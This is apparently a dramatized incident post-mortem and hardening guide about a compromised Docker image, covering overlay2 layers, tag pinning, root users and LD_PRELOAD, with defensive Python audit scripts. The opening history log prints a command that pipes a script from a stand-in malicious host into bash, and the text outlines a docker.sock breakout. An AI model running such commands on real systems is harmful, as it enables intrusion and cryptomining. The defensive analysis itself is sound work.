Docker Image Explained: A Complete Guide for Developers

```text
root@ops-warn-01:~# docker history --no-trunc 8f3a2b1c9d
IMAGE        CREATED        CREATED BY                                                         SIZE    COMMENT
8f3a2b1c9d   72 hours ago   /bin/sh -c #(nop) ENTRYPOINT ["/usr/local/bin/python3" "app.py"]   0B
<missing>    72 hours ago   /bin/sh -c #(nop) COPY file:a7b8c9d0… in /app/app.py               1.2kB
<missing>    72 hours ago   /bin/sh -c curl -sSL http://malicious-actor.io/payload.sh | bash   45MB
<missing>    72 hours ago   /bin/sh -c pip install --no-cache-dir -r requirements.txt          120MB
<missing>    72 hours ago   /bin/sh -c #(nop) WORKDIR /app                                     0B
<missing>    72 hours ago   /bin/sh -c #(nop) USER root                                        0B
<missing>    74 hours ago   /bin/sh -c #(nop) ENV PYTHON_VERSION=3.11.5                        0B
<missing>    74 hours ago   /bin/sh -c #(nop) FROM alpine:3.18                                 7.3MB

root@ops-warn-01:~# docker inspect 8f3a2b1c9d --format='{{.GraphDriver.Data.UpperDir}}'
/var/lib/docker/overlay2/9e7f8a5b6c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f/diff

root@ops-warn-01:~# ls -lhs /var/lib/docker/overlay2/9e7f8a5b6c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f/diff/usr/bin/
total 1.2M
4.0K -rwsr-xr-x 1 root root 1.1M Oct 12 04:12 .hidden_miner
   0 -rw-r--r-- 1 root root    0 Oct 12 04:15 .pwned
```

## The Opaque Layer Problem and the Overlay2 Graveyard

I’ve been staring at hex dumps for three days. My eyes are bleeding. The CISO wants a "summary." Here is the summary: we are incompetent. We treated every **docker image** like a black box of magic functionality, and that magic just turned into a backdoored reverse shell that bypassed our entire egress filtering. 

The fundamental failure starts with the storage driver. In Docker Engine v24.0.7, `overlay2` is the default. It’s efficient. It’s fast. It’s also a forensic nightmare. When you pull a **docker image**, you aren't pulling a single filesystem. You are pulling a stack of read-only tarballs. Each layer is a delta. If a developer, or an attacker who compromised a CI/CD runner, inserts a malicious binary in layer 3 and then "deletes" it in layer 4, layer 4 only records a whiteout entry that masks the file, so it is gone from the running container’s view. But it is still there. It is sitting in the `/var/lib/docker/overlay2` directory on your host, taking up space and waiting for a clever `LD_PRELOAD` trick or a hijacked entrypoint to call it back into existence.

We found the miner hidden in a layer that wasn't even referenced in the final manifest’s runtime path. The attacker used a `RUN` instruction to curl a script, execute it, and then `rm -rf` the installer in the same command. That removed the script, not the 45MB it left behind in the layer. They didn't squash the layers either, and even if they had, the metadata in the **docker image** config would still show the size discrepancy. We ignored the size. We ignored the history. We just saw "Alpine 3.18" and thought we were safe because it’s small. Small doesn't mean secure. Small just means the exploit fits in a tighter space.

The `copy-on-write` (CoW) mechanism is what makes a **docker image** performant, but it’s also what hides the rot. When the container starts, the kernel uses the `mount` syscall with the `overlay` type to merge these layers. The `lowerdir` contains your base image and intermediate layers. The `upperdir` is where the container writes its changes. If you aren't auditing the `lowerdir` of every **docker image** in your registry, you are already compromised. You just haven't checked the right directory yet.
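To see what the kernel actually merged, read the container's overlay line out of `/proc/mounts` on the host. What follows is a minimal sketch, assuming the usual `/proc/mounts` field order and paths that contain no commas. The function name and the sample paths are mine, not anything Docker ships.

```python
def parse_overlay_options(mount_line: str) -> dict:
    """Pull lowerdir/upperdir/workdir out of one overlay line from /proc/mounts."""
    fields = mount_line.split()
    # Field order in /proc/mounts: device, mountpoint, fstype, options, dump, pass.
    if len(fields) < 4 or fields[2] != "overlay":
        raise ValueError("not an overlay mount line")
    opts = {}
    for item in fields[3].split(","):
        key, sep, value = item.partition("=")
        if sep:  # skip bare flags such as "rw" or "relatime"
            opts[key] = value
    lower = opts.get("lowerdir", "")
    return {
        # lowerdir is a colon-separated stack, topmost layer first
        "lowerdir": lower.split(":") if lower else [],
        "upperdir": opts.get("upperdir"),
        "workdir": opts.get("workdir"),
    }


# Hypothetical sample line; real paths will differ on your host.
SAMPLE = (
    "overlay /var/lib/docker/overlay2/abc/merged overlay "
    "rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,"
    "upperdir=/var/lib/docker/overlay2/abc/diff,"
    "workdir=/var/lib/docker/overlay2/abc/work 0 0"
)

if __name__ == "__main__":
    for layer_dir in parse_overlay_options(SAMPLE)["lowerdir"]:
        print("audit:", layer_dir)
```

Every directory in `lowerdir` is a place a file can sit without showing up in the container's own writes. The `upperdir` only tells you what changed after start.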

## The "Latest" Tag is Professional Negligence

I am tired of seeing `image: node:latest` in production YAML files. It is a sign of a team that has given up. The `latest` tag is not a version. It is a moving target. It is a pointer to whatever was pushed to the registry five minutes ago. In this incident, the attacker pushed a poisoned **docker image** to a public repository with the `latest` tag, shadowing the official one for a three-minute window. Our automated patch bot—another piece of "helpful" garbage—saw the update, pulled the new **docker image**, and deployed it across the staging cluster.

By the time the official maintainers reverted the tag, the damage was done. We had already cached the malicious **docker image** locally. Because we didn't use content-addressable hashes (SHA256 digests), our systems thought they were running the legitimate software. A **docker image** should never be referenced by a tag in a production environment. Ever. If you aren't using `image: alpine:3.18@sha256:48d9183bb03a...`, you aren't doing configuration management. You're gambling with the company's infrastructure.
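A pre-deploy gate for this can be very small. Here is a minimal sketch, assuming you have already collected the `image:` strings from your manifests. `is_pinned` and `unpinned_images` are names I made up, and the check only looks at the shape of the reference. It does not contact a registry.

```python
import re

# A pinned reference ends in "@sha256:" followed by 64 lowercase hex characters.
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")


def is_pinned(image_ref: str) -> bool:
    """True when the reference carries a full SHA256 digest."""
    return DIGEST_RE.search(image_ref.strip()) is not None


def unpinned_images(image_refs) -> list:
    """Return every reference that could silently resolve to different content."""
    return [ref for ref in image_refs if not is_pinned(ref)]


if __name__ == "__main__":
    fake_digest = "0" * 64  # placeholder, not a real image digest
    refs = ["node:latest", "alpine:3.18", "alpine:3.18@sha256:" + fake_digest]
    for ref in unpinned_images(refs):
        print("REJECT:", ref)
```

Fail the pipeline when `unpinned_images` returns anything. A truncated digest fails the check too, which is the point.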

The digest is the only thing that matters. It’s the hash of the manifest, which includes the hashes of all the layers. When you pull a **docker image** by digest, the Docker Engine v24.0.7 daemon verifies that what it downloaded matches what you asked for. Tags are just stickers. Anyone can peel a sticker off and put it on a different box. You can't forge a SHA256 digest without finding a hash collision, and nobody has. Pick the digest.
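The check itself is nothing exotic. This is a sketch of the comparison, assuming you hold the raw manifest bytes exactly as the registry served them (re-serialized JSON will hash differently). The function names are illustrative.

```python
import hashlib
import hmac


def manifest_digest(manifest_bytes: bytes) -> str:
    """Content address of a manifest: SHA256 over its raw bytes."""
    return "sha256:" + hashlib.sha256(manifest_bytes).hexdigest()


def matches_digest(manifest_bytes: bytes, expected: str) -> bool:
    """Compare the computed digest with the one you pinned."""
    return hmac.compare_digest(manifest_digest(manifest_bytes), expected)


if __name__ == "__main__":
    original = b'{"layers": ["hypothetical"]}'
    pinned = manifest_digest(original)
    tampered = original.replace(b"hypothetical", b"poisoned")
    print(matches_digest(original, pinned), matches_digest(tampered, pinned))
```

Change one byte of the manifest, including any layer hash inside it, and the comparison fails. A tag gives you no such property.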

## The Frozen Crime Scene Analogy

We need to stop talking about containers as "lightweight VMs." They aren't. A **docker image** is a frozen crime scene. It is a static snapshot of a filesystem and a set of execution instructions. The container is just a process—or a group of processes—running on the host kernel, restricted by namespaces and cgroups. If the **docker image** is poisoned, the container is born with a terminal illness.

Think of the **docker image** as the DNA. If the DNA has a mutation that says "at 3:00 AM, call home to a C2 server," the organism will do exactly that. You can't "fix" a running container. You don't patch a container. You kill it, fix the **docker image**, and redeploy. But we didn't do that. We tried to run `apt-get update` inside the running containers like it was 2005. All we did was create more `upperdir` noise in the `overlay2` storage, making it harder to find the original exploit.

Forensics on a **docker image** requires a different mindset. You don't log in to the container. You export the **docker image** as a tarball using `docker save`, you extract the layers, and you run static analysis on the binaries. We found a modified `libc.so` in one of the middle layers. It was designed to intercept `execve` syscalls. Every time a developer tried to run `ls` or `ps` to see what was happening, the hijacked library filtered out any process names containing "miner" or "exploit." The **docker image** was gaslighting us.
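The first pass over a `docker save` archive can be automated. The following is a rough sketch, assuming the archive has a top-level `manifest.json` with a `Layers` list and that you only care about the first image in it. `scan_saved_image` is a hypothetical helper, and it loads each layer into memory, so don't point it at multi-gigabyte images without rethinking that.

```python
import io
import json
import stat
import tarfile


def scan_saved_image(archive):
    """Walk every layer of a `docker save` archive and flag suspicious entries.

    `archive` is a binary file object. Returns (layer, path, reasons) tuples.
    """
    findings = []
    with tarfile.open(fileobj=archive) as outer:
        manifest = json.load(outer.extractfile("manifest.json"))
        for layer_path in manifest[0]["Layers"]:
            layer_bytes = outer.extractfile(layer_path).read()
            with tarfile.open(fileobj=io.BytesIO(layer_bytes)) as layer:
                for member in layer:
                    base = member.name.rsplit("/", 1)[-1]
                    reasons = []
                    if base.startswith(".wh."):
                        # Whiteout marker: a later layer "deleted" something here.
                        reasons.append("whiteout")
                    elif member.isfile():
                        if member.mode & stat.S_ISUID:
                            reasons.append("setuid")
                        if base.startswith("."):
                            reasons.append("hidden")
                    if reasons:
                        findings.append((layer_path, member.name, reasons))
    return findings
```

Run it as `scan_saved_image(open("image.tar", "rb"))` after `docker save -o image.tar <image>`. A setuid dotfile under `usr/bin` is exactly the kind of entry it would surface. Every whiteout it reports is a deletion worth tracing back to the layer that still holds the original file.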

## Root by Default: The USER Instruction Failure

Why are we still running as root? Docker Engine v24.0.7 makes it trivial to specify a non-privileged user, yet every **docker image** I’ve audited this week defaults to UID 0. In this breach, the attacker gained execution through a vulnerable Python library. Because the **docker image** didn't have a `USER` instruction, the process was running as root inside the container.

From there, it was a straight shot to a breakout. They didn't even need a sophisticated kernel exploit. They just looked for sensitive mounts. We had mounted `/var/run/docker.sock` into the container because some "DevOps Guru" thought it was necessary for "monitoring." Since the process was root, it just talked to the Docker socket, pulled a new, even more privileged **docker image**, and started a sidecar container with `--privileged` and `--net=host`. 

If the **docker image** had been built with `USER 10001`, the initial exploit would have been trapped. It wouldn't have had the permissions to read the mounted socket. It wouldn't have been able to modify the `/etc/hosts` file to redirect traffic. But no. We keep building every **docker image** with the keys to the kingdom baked into the manifest. It’s lazy. It’s dangerous. It’s why I haven't slept.
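Catching this before deploy takes a few lines. Below is a minimal sketch, assuming you feed it one entry from the JSON array that `docker inspect <image>` prints. `runs_as_root` is my name for the check, and it cannot see a `--user` override passed at run time.

```python
def runs_as_root(image_inspect: dict) -> bool:
    """True when the image's configured user is empty, "root", or UID 0."""
    config = image_inspect.get("Config") or {}
    user = (config.get("User") or "").strip()
    # The field may be "user", "uid", "user:group", or "uid:gid".
    uid_part = user.split(":", 1)[0]
    return uid_part in ("", "0", "root")


if __name__ == "__main__":
    print(runs_as_root({"Config": {"User": ""}}))       # no USER instruction
    print(runs_as_root({"Config": {"User": "10001"}}))  # non-privileged UID
```

An empty `User` field is the case that bit us: no `USER` instruction means UID 0.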

## Multi-Stage Builds and the Myth of the SBOM

We need to talk about the "Software Bill of Materials" (SBOM). Everyone wants one. Nobody reads them. And most of them are wrong because the **docker image** build process is a mess. A standard `Dockerfile` that pulls a bunch of dependencies via `npm install` or `pip install` is non-deterministic. You build the **docker image** today, you get version 1.2. Build it tomorrow, you get 1.3 because a sub-dependency updated.
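The drift is easy to spot at the source. This is a rough sketch for the `pip` case, assuming a plain `requirements.txt`. The helper name is made up, and an exact `==` pin on a top-level package still says nothing about its sub-dependencies unless you also lock those.

```python
import re


def unpinned_requirements(text: str) -> list:
    """Return requirement lines that are not pinned to an exact version."""
    loose = []
    for raw in text.splitlines():
        # Strip comments: a "#" at line start or preceded by whitespace.
        line = re.sub(r"(^|\s)#.*$", "", raw).strip()
        if not line or line.startswith("-"):
            continue  # blank lines and pip options such as "-r base.txt"
        if "==" not in line:
            loose.append(line)
    return loose


if __name__ == "__main__":
    sample = "flask==2.3.3\nrequests>=2.0  # floats\nurllib3\n"
    print(unpinned_requirements(sample))
```

Anything this returns is a line that can resolve to a different version tomorrow, which means the SBOM you generated today describes a different image.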

The only way to get a clean **docker image** is through multi-stage builds. You use a heavy image with all your compilers and build tools, then you `COPY --from=build` only the compiled artifacts into a "distroless" or minimal Alpine 3.18 base. This reduces the attack surface. If there is no `sh`, no `curl`, and no `python` in your final **docker image**, the attacker has a much harder time staging a payload.

In this incident, the attacker relied on `curl` being present in the **docker image**. They used it to pull their second-stage malware. If we had used a distroless **docker image**, their script would have failed with a `command not found` error. We would have seen the alerts in our syscall logs (if we were actually looking at `execve` failures). Instead, we gave them a full suite of GNU utilities to use against us. We built the gallows, tied the noose, and then handed them the rope.

## The Manifest.json and the Anatomy of a Lie

Let’s look at the `manifest.json` of the compromised **docker image**. This is the file inside a `docker save` archive that tells the Docker Engine which layers to load and in what order.

```json
[
  {
    "Config": "b7a3...json",
    "RepoTags": ["internal-registry.local/app:latest"],
    "Layers": [
      "layers/01.../layer.tar",
      "layers/02.../layer.tar",
      "layers/03.../layer.tar"
    ]
  }
]
```

Each of those `layer.tar` files is a potential hiding spot. When you run `docker inspect`, you’re looking at the Config JSON. It tells you the environment variables, the entrypoint, and the labels. But it doesn’t tell you what’s inside the layers. You can have a label that says `security_scan=passed`, and it means nothing. It’s just a string.

The attacker modified the `config.json` inside the docker image to include an `LD_PRELOAD` environment variable pointing to a library hidden in a “missing” layer. When the container started, the dynamic linker loaded the malicious library before anything else. This is why your “vulnerability scanners” didn’t find anything. They were looking for known CVEs in package versions. They weren’t looking for unauthorized shared objects hidden in the `overlay2` diff directories.
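This particular trick is cheap to check for. Here is a minimal sketch, assuming one entry of `docker inspect <image>` output with its `Config.Env` list of `KEY=VALUE` strings. The variable list and the function name are my choices. A hit on `LD_LIBRARY_PATH` is a reason to look, not proof of compromise, since some legitimate images set it.

```python
# Environment variables that change what the dynamic linker loads.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}


def loader_overrides(image_inspect: dict) -> dict:
    """Return any dynamic-linker variables baked into the image config."""
    env = (image_inspect.get("Config") or {}).get("Env") or []
    hits = {}
    for entry in env:
        key, _, value = entry.partition("=")
        if key in LOADER_VARS:
            hits[key] = value
    return hits


if __name__ == "__main__":
    # Hypothetical config; the library path is invented for illustration.
    sample = {"Config": {"Env": ["PATH=/usr/bin", "LD_PRELOAD=/usr/lib/.cache.so"]}}
    print(loader_overrides(sample))
```

Any `LD_PRELOAD` in an image you did not put there yourself should stop the deploy until someone has opened the file it points to.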

We need to start treating the docker image as untrusted code. I don’t care if it came from our internal build server. If the build server is compromised, every docker image it produces is a weapon. We need to implement binary authorization. We need to sign the images with Cosign or Notary. We need to verify those signatures at the admission controller level in Kubernetes. If the docker image isn’t signed by a trusted key, it doesn’t run. Period.

## Hardening the Pipeline: A Survival Guide

If you’ve made it this far and you still think your “best practices” are enough, you’re delusional. Here is what we are doing moving forward. No more “marketing fluff” security.

First, every docker image must be built using BuildKit with secret mounts (`RUN --mount=type=secret`). No more passing API keys as `ENV` variables. Those variables are baked into the docker image metadata and are visible to anyone with `docker inspect`. We found three AWS keys and a database password in the layers of the “secure” docker image we were using for the payment gateway.

Second, we are banning the use of `apk add` or `apt-get install` in the final stage of any docker image. If you need a package, you build it in a separate stage and copy the binary. We need to know exactly what is in the `bin` folder. No more “recommended” dependencies that pull in half of X11 just to run a Go binary.

Third, we are implementing mandatory squashing for any docker image that isn’t using multi-stage builds. While squashing loses the history, it also prevents the “hidden file in a lower layer” trick. But honestly, if you’re squashing, you’re just covering up a bad build process. Use multi-stage builds instead.

Fourth, we are auditing the `finit_module` and `ptrace` syscalls. A container should never be loading kernel modules. A docker image should never need the `CAP_SYS_PTRACE` capability. If it does, it’s not an application; it’s a rootkit.

Fifth, we are moving to a “Read-Only” root filesystem. In Docker Engine v24.0.7, you can run a container with `--read-only`. This forces every write onto a volume or `tmpfs` mount you declare explicitly. If the docker image is immutable and the runtime is read-only, the attacker has nowhere to persist. They can’t drop a miner in `/tmp` if `/tmp` is a 16MB `tmpfs` mount that vanishes when the container restarts.
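Several of these rules can be checked against containers that are already running. The following is a rough sketch, assuming one entry of `docker inspect <container>` output and its `HostConfig` and `Mounts` fields. `audit_container` and the wording of the findings are mine, and it covers only the runtime items above, not the build-time ones.

```python
def audit_container(inspect_entry: dict) -> list:
    """List runtime settings that violate the hardening rules."""
    host = inspect_entry.get("HostConfig") or {}
    problems = []
    if not host.get("ReadonlyRootfs"):
        problems.append("root filesystem is writable")
    if host.get("Privileged"):
        problems.append("running with --privileged")
    if host.get("NetworkMode") == "host":
        problems.append("sharing the host network namespace")
    for cap in host.get("CapAdd") or []:
        name = cap.upper()
        if name.startswith("CAP_"):
            name = name[4:]
        # SYS_MODULE permits kernel module loading; SYS_PTRACE permits ptrace.
        if name in ("SYS_PTRACE", "SYS_MODULE", "ALL"):
            problems.append("added capability " + name)
    for mount in inspect_entry.get("Mounts") or []:
        source = mount.get("Source") or ""
        if source.endswith("docker.sock"):
            problems.append("Docker socket mounted from " + source)
    return problems


if __name__ == "__main__":
    sidecar = {
        "HostConfig": {"Privileged": True, "NetworkMode": "host", "CapAdd": None},
        "Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
    }
    for problem in audit_container(sidecar):
        print("FAIL:", problem)
```

An empty list is the only acceptable result. The sample entry mirrors the sidecar from this incident: privileged, on the host network, with the socket mounted.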

## The Cost of Convenience

We traded security for convenience, and we got exactly what we deserved. We wanted “fast” deployments, so we skipped the deep inspection of every docker image. We wanted “easy” developer workflows, so we let everyone push to the registry. We wanted “seamless” (I hate that word) integration, so we ignored the fact that our supply chain was a spiderweb of unverified third-party code.

Every docker image you pull is a liability. Every layer is a risk. Every `latest` tag is a ticking time bomb. I’m going home now. I’m going to sleep for 12 hours, and then I’m coming back to delete every docker image in our registry that doesn’t have a verifiable SBOM and a cryptographic signature. If the apps break, they break. At least they won’t be mining Monero for a teenager in another hemisphere.

The next time someone tells you that containers are “secure by default,” show them the `overlay2` diff directory. Show them the `docker history` of a compromised image. Show them the 1.1MB hidden binary that took down a multi-million dollar infrastructure. A docker image is only as secure as the paranoia of the person who built it. And right now, we aren’t nearly paranoid enough.

Final check of the environment before I log off:

```text
root@ops-warn-01:~# docker images --digests
REPOSITORY                TAG       DIGEST                                                                    IMAGE ID       CREATED        SIZE
internal-registry/app     <none>    sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855   8f3a2b1c9d     72 hours ago   172MB
root@ops-warn-01:~# # Still there. Still ugly. Still a disaster.
```

The docker image is the unit of delivery, but it’s also the unit of infection. Treat it with the respect, and the fear, it deserves. If you don’t, you’ll be the one sitting here at 4:00 AM, writing a post-mortem for a company that no longer exists. Don’t say I didn’t warn you. The layers are watching. The `overlay2` driver doesn’t forget. And neither do I.

We are moving to Alpine 3.18 for everything, but even then, I’m stripping the shell. No `sh`, no `ash`, no `bash`. Just the binary and the void. That is the only way to be sure. If you can’t `exec` into it, the attacker has a much harder time living off the land. It makes debugging a nightmare, but I’d rather have a nightmare during the day than a breach in the middle of the night.

This forensic report is closed. The docker image in question has been purged from the local cache and the registry. The CI/CD runners have been wiped. The keys have been rotated. But the “Opaque Layer Problem” remains. It’s built into the very architecture of how we build and ship software. We are just waiting for the next “latest” tag to ruin our lives again.

Stay paranoid. Check your digests. Audit your layers. Or find a new career, because this one is burning down.
